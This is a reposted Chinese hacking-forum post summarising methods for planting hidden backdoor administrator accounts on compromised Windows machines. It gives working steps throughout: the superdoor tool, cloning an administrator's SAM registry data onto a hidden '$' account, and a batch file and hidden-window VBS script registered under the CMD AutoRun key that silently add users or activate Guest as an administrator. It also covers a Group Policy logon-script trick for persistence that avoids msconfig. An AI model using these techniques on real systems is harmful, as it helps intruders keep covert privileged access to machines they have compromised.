[转载]windows系统后门账号小结
文章作者:下雨天1.是用superdoor这个工具(要VB运行库)
用法:door user password 例 :door xysky$ 123456
在CMD中和计算机管理看不到,要注册表中可以看
高手用winlogo查PID 一看就知了,还要,进注册表也可
附,如果在运行CMD的时候进注册表这里,会报错,哈!
PS:偶一直少用这个工具,晕,被杀撒!
2.在注册表中克隆一个建立隐藏账号
如果你喜欢工具,用榕哥的CA就可以了,我这是在注册表在操作,一样的原理撒!
首先3389上肉鸡
进入注册表regedt32(注册这里的是regedt32,与regedit不同撒)
增加当前用户访问HKEY_LOCAL_MACHINE\SAM\ADM的权限
进了这里,选中SAM,点安全-->权限,在对话框中增加当前用户并勾选上“完全控制”
新建一个用户 net user xysky$ 123456 /add
再打开注册表regedit
访问HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users
和HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names
将xysky$克隆成管理员
就是复制管理员的数据到你的撒
导出xysky$所对应的两个值
将xysky$删掉 net user xysky$ /del
导入刚才导出的两个值,建立完成
PS:用户建好之后,在命令行里和电脑管理中看不到此用户,只有在用这个用户登陆的时候才能看到,不能改密码,改了注册表会出错,在命令行下删不掉,只有在注册表里可以删除。另外,你可以克隆其它任何人撒,这里只提供思路!
3.做不死的幽灵账号
首先说一下原理:
HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor\AutoRun
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\AutoRun
这两个位置 如果 /D 未在命令行上被指定,当 CMD.EXE 运行时,它会自动寻找以下 REG_SZ/REG_EXPAND_SZ 注册表变量。如果其中一个或两个都存在,这两个变量会先予执行。
也就是说,只要启动了CMD就会运行上述的脚本,可以说成是CMD关联吧。
相信懂了原理,你想干什么就干什么,我这里是做账号撒!!
可能你想建个批处理放到这个注册表下,呵呵。
批处理代码如下:
@echo off
net user xysky$ 123456789 /add
net localgroup administrators xysky$ /add
保存成一个批处理文件,放到注册表启动中关联CMD!
你亲自试一下吧,打开你的CMD,会不会有点不同呢!
Microsoft Windows 2000 [Version 5.00.2195]
(C) 版权所有 1985-2000 Microsoft Corp.
命令成功完成。
命令成功完成。
D:\WINNT>
因为你执行了两个命令所以有两个成功显示撒!
呵,我想管理员会发现的撒!
呵,下面这代码就有了它的优点,呵!
先建立一个VBS文件内容如下:
dim wsh
set wsh=CreateObject("WScript.Shell")
wsh.run "net user guest /active:yes",0
wsh.run "net user guest 123456789",0
wsh.run "net localgroup administrators guest /add",0
上面一段VBS的意思就是激活GUEST帐号,并且加为高级管理组,设置密码为123456789
保存好,再进入注册表,找到上面的位置,填上这个VBS的路径,呵呵!
好了,打开你的计算机管理,关了GUEST 再开CMD,再打开你的计算机管理,呵呵!有什么发现呢!
PS:我想你看了这里,可能想到更多的方法,只要是可以随系统启动运行就可以了,比如在组策略里加载这个文件启动,呵!下面我们来演示一下吧!
4.另类的隐藏启动方式
在黑客在线7上看了一篇文章,有了点思路,于是用到账号上来,呵呵!
木马你了解吗?一般是在一些设置启动的文件如win.ini或者注册表中启动相关,再高级点的就是注册为服务,随系统启动而启动!不过以上启动方式都可以在msconfig 启动 服务 中找到踪迹!
下面利用组策略的用户登陆运行程序,呵呵!
开始-->运行 在中执行 Gpedit.msc 打开组策略 依次展开用户配置 管理模板 系统 登陆 在右边找到“在用户登陆时运行这些程序” 双击打开 设为启用 并按显示按钮 出现“显示内容”窗口,在这里添加你的程序(我这里是加载上面的脚本,呵呵!)就得了。 本来要问帖子,结果回错了地方,只好重新编辑成这样了。
页:
[1]